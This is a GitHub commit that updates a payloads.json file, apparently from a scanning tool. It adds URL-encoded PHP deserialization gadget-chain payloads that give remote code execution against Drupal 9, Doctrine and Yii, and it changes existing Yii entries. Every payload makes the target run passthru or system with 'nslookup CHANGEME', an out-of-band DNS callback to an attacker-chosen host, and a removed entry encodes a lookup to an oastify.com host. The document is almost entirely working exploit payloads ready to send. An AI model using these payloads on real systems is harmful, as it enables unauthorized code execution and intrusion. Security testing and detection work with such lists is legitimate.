Update payloads.json

Add: - Yii/RCE2 - Doctrine/RCE1 - Doctrine/RCE2 - Drupal9/RCE1
ricardojba · Dec 29, 2022 · 7271dc9 · 7271dc9
1 parent c7d97cf
commit 7271dc9
Showing 1 changed file with 22 additions and 4 deletions.
diff --git a/res/payloads.json b/res/payloads.json
@@ -59,6 +59,24 @@
     "gen_with": "./phpggc Drupal7/RCE1 <function> <parameter>",
     "payload": "O:11:\"SchemaCache\":4:{s:6:\"%00*%00cid\"%3Bs:14:\"form_DrupalRCE\"%3Bs:6:\"%00*%00bin\"%3Bs:10:\"cache_form\"%3Bs:16:\"%00*%00keysToPersist\"%3Ba:3:{s:8:\"#form_id\"%3Bb:1%3Bs:8:\"#process\"%3Bb:1%3Bs:9:\"#attached\"%3Bb:1%3B}s:10:\"%00*%00storage\"%3Ba:3:{s:8:\"#form_id\"%3Bs:9:\"DrupalRCE\"%3Bs:8:\"#process\"%3Ba:1:{i:0%3Bs:23:\"drupal_process_attached\"%3B}s:9:\"#attached\"%3Ba:1:{s:6:\"system\"%3Ba:1:{i:0%3Ba:1:{i:0%3Bs:63:\"nslookup CHANGEME\"%3B}}}}}"
   },
+  {
+    "_needs_dynamic_payload_editing": false,
+    "name": "Drupal -8.9.6 <= 9.4.9+",
+    "gen_with": "./phpggc Drupal9/RCE1 <function> <parameter>",
+    "payload": "O:31:\"GuzzleHttp\\Cookie\\FileCookieJar\":1:{s:41:\"%00GuzzleHttp\\Cookie\\FileCookieJar%00filename\"%3BO:32:\"Laminas\\Diactoros\\RelativeStream\":1:{s:49:\"%00Laminas\\Diactoros\\RelativeStream%00decoratedStream\"%3BO:26:\"GuzzleHttp\\Psr7\\PumpStream\":2:{s:34:\"%00GuzzleHttp\\Psr7\\PumpStream%00source\"%3Bs:1:\"1\"%3Bs:34:\"%00GuzzleHttp\\Psr7\\PumpStream%00buffer\"%3BO:32:\"Drupal\\Core\\Config\\CachedStorage\":2:{s:10:\"%00*%00storage\"%3BO:32:\"Drupal\\Core\\Config\\MemoryStorage\":1:{s:13:\"%00*%00collection\"%3Bs:0:\"\"%3B}s:8:\"%00*%00cache\"%3BO:46:\"Drupal\\Component\\DependencyInjection\\Container\":1:{s:21:\"%00*%00serviceDefinitions\"%3Ba:1:{i:1000000%3Bs:132:\"a:2:{s:7:\"factory\"%3Bs:8:\"passthru\"%3Bs:9:\"arguments\"%3Ba:1:{i:0%3Bs:63:\"nslookup CHANGEME\"%3B}}\"%3B}}}}}}"
+  },
+  {
+    "_needs_dynamic_payload_editing": false,
+    "name": "Doctrine/RCE1 1.5.1 <= 2.7.2",
+    "gen_with": "./phpggc Doctrine/RCE1 <code>",
+    "payload": "8.1.12a:4:{i:1000%3BO:39:\"Doctrine\\Common\\Cache\\Psr6\\CacheAdapter\":3:{s:13:\"deferredItems\"%3Ba:1:{i:0%3BO:41:\"Doctrine\\Common\\Cache\\Psr6\\TypedCacheItem\":2:{s:6:\"expiry\"%3Bi:99999999999999999%3Bs:5:\"value\"%3Bs:4:\"test\"%3B}}s:6:\"loader\"%3Bi:1%3Bs:5:\"cache\"%3BO:71:\"Symfony\\Component\\HttpFoundation\\Session\\Storage\\MockFileSessionStorage\":5:{s:7:\"started\"%3Bb:1%3Bs:8:\"savePath\"%3Bs:4:\"/tmp\"%3Bs:2:\"id\"%3Bs:3:\"aaa\"%3Bs:4:\"data\"%3Ba:1:{i:0%3Bs:85:\"<?php passthru('nslookup CHANGEME')%3B ?>\"%3B}s:11:\"metadataBag\"%3BO:60:\"Symfony\\Component\\HttpFoundation\\Session\\Storage\\MetadataBag\":1:{s:10:\"storageKey\"%3Bs:1:\"a\"%3B}}}i:1000%3Bi:1%3Bi:2000%3BO:39:\"Doctrine\\Common\\Cache\\Psr6\\CacheAdapter\":3:{s:13:\"deferredItems\"%3Ba:1:{i:0%3BO:41:\"Doctrine\\Common\\Cache\\Psr6\\TypedCacheItem\":2:{s:6:\"expiry\"%3Bi:0%3Bs:5:\"value\"%3Bs:4:\"test\"%3B}}s:6:\"loader\"%3Bi:1%3Bs:5:\"cache\"%3BO:44:\"Symfony\\Component\\Cache\\Adapter\\ProxyAdapter\":1:{s:4:\"pool\"%3BO:47:\"Symfony\\Component\\Cache\\Adapter\\PhpArrayAdapter\":1:{s:4:\"file\"%3Bs:17:\"/tmp/aaa.mocksess\"%3B}}}i:2000%3Bi:1%3B}"
+  },
+  {
+    "_needs_dynamic_payload_editing": false,
+    "name": "Doctrine/RCE2 1.11.0 <= 2.3.2",
+    "gen_with": "./phpggc Doctrine/RCE2 <function> <parameter>",
+    "payload": "O:39:\"Doctrine\\Common\\Cache\\Psr6\\CacheAdapter\":2:{s:13:\"deferredItems\"%3Ba:1:{i:0%3BO:41:\"Symfony\\Component\\Cache\\Traits\\RedisProxy\":2:{s:5:\"redis\"%3Bs:63:\"nslookup CHANGEME\"%3Bs:11:\"initializer\"%3BO:61:\"Doctrine\\Bundle\\DoctrineBundle\\Dbal\\SchemaAssetsFilterManager\":1:{s:18:\"schemaAssetFilters\"%3Ba:1:{i:0%3Bs:8:\"passthru\"%3B}}}}s:6:\"loader\"%3Bi:1%3B}"
+  },
   {
     "_needs_dynamic_payload_editing": false,
     "name": "Guzzle 6.0.0 <= 6.3.2",
@@ -374,15 +392,15 @@
   },
   {
     "_needs_dynamic_payload_editing": true,
-    "name": "Yii 1.1.20 (1)",
-    "gen_with": "./phpggc Yii/RCE1 <function> <parameter>",
-    "payload": "O:11:\"CDbCriteria\":1:{s:6:\"params\"%3BO:12:\"CMapIterator\":3:{s:16:\"%00CMapIterator%00_d\"%3BO:10:\"CFileCache\":7:{s:9:\"keyPrefix\"%3Bs:0:\"\"%3Bs:7:\"hashKey\"%3Bb:0%3Bs:10:\"serializer\"%3Ba:1:{i:1%3Bs:6:\"system\"%3B}s:9:\"cachePath\"%3Bs:10:\"data:text/\"%3Bs:14:\"directoryLevel\"%3Bi:0%3Bs:11:\"embedExpiry\"%3Bb:1%3Bs:15:\"cacheFileSuffix\"%3Bs:108:\"%3Bbase64,OTk5OTk5OTk5OW5zbG9va3VwIHBvaS1zbGluZ2VyLmFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYS5vYXN0aWZ5LmNvbQ==\"%3B}s:19:\"%00CMapIterator%00_keys\"%3Ba:1:{i:0%3Bi:0%3B}s:18:\"%00CMapIterator%00_key\"%3Bi:0%3B}}"
+    "name": "Yii 1.1.20 (2)",
+    "gen_with": "./phpggc Yii/RCE2 <function> <parameter>",
+    "payload": "O:15:\"WikiPublishTask\":1:{s:28:\"%00WikiPublishTask%00cookiesFile\"%3BO:39:\"Prophecy\\Argument\\Token\\ExactValueToken\":2:{s:45:\"%00Prophecy\\Argument\\Token\\ExactValueToken%00util\"%3BO:44:\"PHPUnit_Extensions_Selenium2TestCase_Session\":3:{s:11:\"%00*%00commands\"%3Ba:1:{s:9:\"stringify\"%3Bs:8:\"passthru\"%3B}s:6:\"%00*%00url\"%3BO:40:\"PHPUnit_Extensions_Selenium2TestCase_URL\":0:{}s:9:\"%00*%00driver\"%3BO:23:\"DocBlox_Parallel_Worker\":0:{}}s:46:\"%00Prophecy\\Argument\\Token\\ExactValueToken%00value\"%3Bs:63:\"nslookup CHANGEME\"%3B}}"
   },
   {
     "_needs_dynamic_payload_editing": false,
     "name": "Yii2 < 2.0.38 (CVE-2020-15148) (1)",
     "gen_with": "./phpggc Yii2/RCE1 <function> <parameter>",
-    "payload": "O:23:\"yii\\db\\BatchQueryResult\":1:{s:36:\"%00yii\\db\\BatchQueryResult%00_dataReader\"%3BO:17:\"yii\\db\\Connection\":2:{s:3:\"pdo\"%3Bi:1%3Bs:3:\"dsn\"%3BO:26:\"yii\\db\\ColumnSchemaBuilder\":2:{s:7:\"%00*%00type\"%3Bs:1:\"x\"%3Bs:11:\"categoryMap\"%3BO:22:\"yii\\caching\\ArrayCache\":2:{s:10:\"serializer\"%3Ba:1:{i:1%3Bs:6:\"system\"%3B}s:30:\"%00yii\\caching\\ArrayCache%00_cache\"%3Ba:1:{s:1:\"x\"%3Ba:2:{i:0%3Bs:63:\"nslookup CHANGEME\"%3Bi:1%3Bi:0%3B}}}}}}"
+    "payload": "O:23:\"yii\\db\\BatchQueryResult\":1:{s:36:\"%00yii\\db\\BatchQueryResult%00_dataReader\"%3BO:17:\"yii\\db\\Connection\":2:{s:3:\"pdo\"%3Bi:1%3Bs:3:\"dsn\"%3BO:26:\"yii\\db\\ColumnSchemaBuilder\":2:{s:7:\"%00*%00type\"%3Bs:1:\"x\"%3Bs:11:\"categoryMap\"%3BO:22:\"yii\\caching\\ArrayCache\":2:{s:10:\"serializer\"%3Ba:1:{i:1%3Bs:8:\"passthru\"%3B}s:30:\"%00yii\\caching\\ArrayCache%00_cache\"%3Ba:1:{s:1:\"x\"%3Ba:2:{i:0%3Bs:63:\"nslookup CHANGEME\"%3Bi:1%3Bi:0%3B}}}}}}"
   },
   {
     "_needs_dynamic_payload_editing": false,